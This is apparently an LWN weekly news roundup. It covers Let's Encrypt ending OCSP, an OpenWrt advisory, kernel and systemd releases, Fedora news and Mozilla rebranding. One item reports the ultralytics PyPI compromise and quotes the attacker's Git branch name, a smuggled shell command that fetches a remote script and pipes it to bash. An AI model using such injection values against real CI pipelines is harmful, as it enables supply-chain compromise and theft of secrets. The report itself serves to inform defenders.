Brief items
Security
Let's Encrypt sets date for ending OCSP support
In July, Let's Encrypt announced it was ending
support "as soon as possible
" for the Online
Certificate Status Protocol (OCSP) in favor of Certificate
Revocation Lists (CRLs) due to privacy concerns. The organization
has now announced
that it has set a timeline, and will be turning off its OCSP
responders on August 6, 2025. There is additional action required
for Let's Encrypt users who use the OCSP Must Staple Extension:
As of January 30, 2025, issuance requests that include the OCSP Must Staple extension will fail, unless the requesting account has previously issued a certificate containing the OCSP Must Staple extension.
As of May 7, all issuance requests that include the OCSP Must Staple extension will fail, including renewals. Please change your ACME client configuration to not request the extension.
Abusing Git branch names to compromise a PyPI package
A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:
openimbot:$({curl,-sSfL,raw.github user content.com/ultra lytics/ ultra lytics/ 12e4f5 4ca3 f2e6 9bcdc 900d 1c6e 16642 ca8ae 545/file.sh}${IFS}|${IFS}bash)
Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its continuous-integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already removed the malicious script.
This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.
A vulnerability in the OpenWrt attended sysupgrade server
The OpenWrt project has issued an advisory regarding a vulnerability found in its Attended Sysupgrade Server that could allow compromised packages to be installed on a router by an attacker. No official OpenWrt images were affected, and the vulnerability is not known to be exploited, but users who have installed images created with an instance of this server are recommended to reinstall.For a detailed description of how the exploit works, see this blog post.
Then, as the hash collision occurred, the server returns the overwritten build artifact to the legitimate request that requests the following packages. [...]By abusing this, an attacker could force the user to upgrade to the malicious firmware, which could lead to the compromise of the device.
Kernel development
Kernel release status
The current development kernel is 6.13-rc2, released on December 8. Linus said:
The diffstat looks a bit unusual with 80%+ drivers, and a lot of it one-liners, but that's actually just because of a couple of automated scripts that got run after -rc1 for some cleanups. Nothing particularly interesting, but it makes for a lot of noise in the diff.
One of those scripts was the EXPORT_SYMBOL_NS() change (to make it use a quoted string for the namespace name) described in this article.
Stable updates: 6.12.2, 6.11.11, and 4.19.325 were released on December 5. Note that both 6.11.11 and 4.19.325 are the last kernels in those series. Thereafter, 6.12.3 was released on December 6 to fix a boot regression. 6.12.4 and 6.6.64 came out on December 9, followed by 6.6.65 (which only contains a build-regression fix) on December 11.
Quote of the week
At this point we actually provide app developers with what they've been repeatedly asking kernel filesystem engineers to provide them for the past 20 years: a way of overwriting arbitrary file data safely without needing an expensive fdatasync operation on every file that gets modified.— Dave Chinner sees an O_PONIES solutionPut simply: atomic writes have a huge potential to fundamentally change the way applications interact with Linux filesystems and to make it *much* simpler for applications to safely overwrite user data.
Distributions
Apertis v2024 released
Apertis is a Collabora-developed Debian derivative distribution designed to be incorporated into electronic devices; the v2024 release is now available. It is now based on the Bookworm release, and includes support for Podman, ONNX Runtime, OP-TEE, and more.
Apertis relies on the Debian Free Software Guidelines to ensure all software shipped is open source or, in limited cases, at least freely distributable. However, for some customers this is not enough to be able to adopt OSS solutions as in their evaluations some provisions in common licenses like the GPL-3 are at odds with regulatory constraints they are subject to. Apertis does not set to solve this decades-long debate, and instead its goal is to increase the adoption of modern, maintained OSS solutions in markets where this has historically been a challenge. To enable this, Apertis supports avoiding the use of any software under some licenses (like the [GPL v3.0 license family) on target images, while still making them fully available for development and for customers that do not share those licensing concerns. To avoid these licenses, Apertis uses more modern alternatives instead of relying on outdated and unmaintained pre-GPL-3 versions. For instance, coreutils and findutils (GPL-3+) are replaced in Apertis by rust-coreutils and rust-findutils.
‘Tis the Season for COSMIC Alpha 4! (System76 Blog)
System76 has announced the fourth alpha release of its Rust-based COSMIC desktop. New features in this version include the ability to set default applications, region and language settings, a new Accessibility applet, as well as support for variable refresh rate (VRR) in the cosmic-comp compositor and the display settings tool. See the blog post for a full list of fixes and performance improvements. LWN covered the first alpha release in August.
Fedora Steering Council election interviews
When the Fedora Engineering Steering Council (FESCo) is up for election, the project posts interviews of the candidates in order to help Fedora contributors make an informed choice. This year, the candidates are Zbigniew Jędrzejewski-Szmek, Tomáš Hrčka, Josh Stone, David Cantrell, Fabio Alessandro Locati, and Kevin Fenzi. All of them except for Locati are current members of the steering council. Voting is open until December 20.
A change of hats! (Fedora Magazine)
Fedora Project Leader (FPL) Matthew Miller writes that he will soon be hanging up the FPL hat:
Stay tuned for a job posting from Red Hat, and details about all that. I'm hoping we can hire someone awesome early in 2025, and make the official handover on the release of auspiciously-numbered Fedora Linux 42.
I'm not going to leave Fedora, though. As I said above, although it might not always feel like it from the outside, Red Hat support for Fedora is stronger than ever, and I plan on helping that grow even more. I'm stepping into a full-time management role in the Community Linux Engineering organization, so Fedora will still be part of my day job, just in a different way.
Development
GNU Shepherd 1.0.0 released
Version 1.0.0 of the GNU Shepherd service manager has been released after a mere 21 years of development.
This 1.0.0 release is published today because we think Shepherd has become a solid tool, meeting user experience standards one has come to expect since systemd changed the game of free init systems and service managers alike. It's also a major milestone for Guix, which has been relying on the Shepherd from a time when doing so counted as dogfooding.
Systemd 257 released
Systemd 257 has been released. As usual, the list of changes is long; it includes support for multipath TCP in socket units, the ability to run processes as init in their own PID namespace, a new tool for signing EFI binaries for secure boot, and a superhero emoji in the run0 shell prompt, among many other things. Also, support for version-1 control groups has been disabled and requires an elaborate dance to re-enable; it will be removed entirely in the next release, along with support for System V service scripts.Development quote of the week
I am now firmly a PostgreSQL developer, no longer really a PostgreSQL user. From the perspective of a developer, I wonder: Do these new discussion places allow interaction with developers? Do they allow interested users to become interested in becoming a developer themselves? As a developer, where should I look to monitor user vibe[s] and feedback?
On pgsql-hackers, we sometimes say things like, nobody has ever requested that, or, we have only seen three such cases in ten years. And we have the records to prove it. But if the mailing lists represent only a fraction of users overall and a fraction of users who want to interact in public, what kind of data is that?
[...] What can we do? I don't mind that there is diversity in the way of interacting with other users and enthusiasts. Some competition is good. But I think the project should provide and own at least one of the options that people actually want to use.
Miscellaneous
Mozilla's new branding strategy
Mozilla would appear to have concluded that the solution to its problems is an extensive rebranding effort:
We teamed up with global branding powerhouse Jones Knowles Ritchie (JKR) to revamp our brand and revitalize our intentions across our entire ecosystem. At the heart of this transformation is making sure people know Mozilla for its broader impact, as well as Firefox. Our new brand strategy and expression embody our role as a leader in digital rights and innovation, putting people over profits through privacy-preserving products, open-source developer tools, and community-building efforts.
Page editor: Daroc Alden
Next page:
Announcements>>